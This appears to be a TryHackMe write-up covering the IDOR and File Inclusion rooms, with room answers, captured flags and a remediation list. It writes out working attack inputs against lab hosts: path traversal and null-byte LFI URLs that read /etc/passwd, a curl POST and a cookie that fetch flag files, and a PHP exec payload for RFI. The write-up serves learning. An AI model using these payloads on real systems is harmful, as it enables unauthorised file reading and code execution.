Task 1 What is an IDOR?
IDOR stands for Insecure Direct Object Reference and is a type of access control vulnerability.
Task 2 An IDOR Example
In some cases, if the user changes the value in the query may find information of others.
Task 3 Finding IDORs in Encoded IDs
The flow of string tampering:
Task 4 Finding IDORs in Hashed IDs
values of md5 hashes could be found at:
Task 5 Finding IDORs in Unpredictable IDs
If the Id cannot be detected using the above methods, an excellent method of IDOR detection is to create two accounts and swap the Id numbers between them. If you can view the other users’ content using their Id number while still being logged in with a different account (or not logged in at all), you’ve found a valid IDOR vulnerability.
Task 6 Where are IDORs located
Task 7 A Practical IDOR Example
Open the link and create a new account and login into.
Open the developer tool and go to network tab, we can see a call:
What is the username for user id 1?
adam84
What is the email address for user id 3?
j@fakemail.thm
File Inclusion
Task 1 Introduction
What is the risk of File inclusion?
It depends! If the attacker can use file inclusion vulnerabilities to read sensitive data. In that case, the successful attack causes to leak of sensitive data, including code and files related to the web application, credentials for back-end systems. Moreover, if the attacker somehow can write to the server such as /tmp directory, then it is possible to gain remote command execution RCE. However, it won’t be effective if file inclusion vulnerability is found with no access to sensitive data and no writing ability to the server.
Task 2 Deploy the VM
deploy the virtual box and access to the TryHackMe network
Task 3 Path Traversal
What function causes path traversal vulnerabilities in PHP?
file_get_contents
The web app is served at /var/www/app
URL query: http://webapp.thm/get.php?file=app/CVs/userCV.pdf
we can access the uverCV.pdf from the path /var/www/app/CVs/userCV.pdf
to navigate to the root directory:http://webapp.thm/get.php?file=../../../../
Then add the path to /etc/passwd: http://webapp.thm/get.php?file=../../../../etc/passwd
Task 4 Local File Inclusion — LFI
Lab 1: there is no specific directory inside the function, we can access to /etc/passwd without input validation.
Lab 2: the include function allows us to include any called files into the current page. The following will be the exploit:http://webapp.thm/index.php?lang=../../../../etc/passwd
Task 5 Local File Inclusion — LFI #2
Give Lab #3 a try to read /etc/passwd. What is the request look like?
http://10.10.27.34/lab3.php?file=../../../../etc/passwd%00
If we add a random string such as asa into the query, we have the response:
Therefore we know we need 4 ../ to navigate to the root directory. Now we correct the query to
Again we have an error. As the task mentioned we should remove the .PHP by adding %00 because include function reads the input with .php
Which function is causing the directory traversal in Lab #4?
/lab3.php?file=../../../../etc/passwd%00
Try out Lab #6 and check what is the directory that has to be in the input field?
we add a random string to the query, we have the response:
THM-profile
Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?
12.04
Task 6 Remote File Inclusion — RFI
Requirement for opening an RFI: allow_url_fopen needs to be on
The risk of RFI is higher than LFI since RFI vulnerabilities allow an attacker to gain Remote Command Execution (RCE) on the server. Other consequences of a successful RFI attack include:
- Sensitive Information Disclosure
- Cross-site Scripting (XSS)
- Denial of Service (DoS)
Create the cmd.txt:
Run a python web server on your local machine:
On your lab browser:
Also you have a response on your local machine if you successfully have your local cmd.txt transferred to virtual box:
Task 7 Remediation
- Keep system and services, including web application frameworks, updated with the latest version.
- Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information.
- A Web Application Firewall (WAF) is a good option to help mitigate web application attacks.
- Disable some PHP features that cause file inclusion vulnerabilities if your web app doesn’t need them, such as allow_url_fopen on and allow_url_include.
- Carefully analyze the web application and allow only protocols and PHP wrappers that are in need.
- Never trust user input, and make sure to implement proper input validation against file inclusion.
- Implement whitelisting for file names and locations as well as blacklisting.
Task 8 Challenge
Steps for testing for LFI
- Find an entry point that could be via GET, POST, COOKIE, or HTTP header values!
- Enter a valid input to see how the web server behaves.
- Enter invalid inputs, including special characters and common file names.
- Don’t always trust what you supply in input forms is what you intended! Use either a browser address bar or a tool such as Burpsuite.
- Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.
- Understand the input validation and if there are any filters!
- Try the inject a valid entry to read sensitive files
Capture Flag1 at /etc/flag1
Use BurpSuite to change the method, right-click:
OR use curl command in terminal:
curl -X POST 10.10.66.13/challenges/chall1.php -d “method=post&file=/etc/flag1”
Capture Flag2 at /etc/flag2\
Edit the cookie in BurpSuite:
Change the Guest value to /etc/flag2, but we still have an error:
Then we refresh the page and change the THM to:
Cookie: THM=../../../../etc/flag2%00
Capture Flag3 at /etc/flag3
Use the following command to receive the source code.
P0st_1s_w0rk1in9
Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?
Add the following command to your local machine
<?PHP print exec(‘hostname’); ?>
start a simply HTTP server
enter the following URL to your browser replaced with your own virtual IP add.
lfi-vm-thm-f8c5b1a78692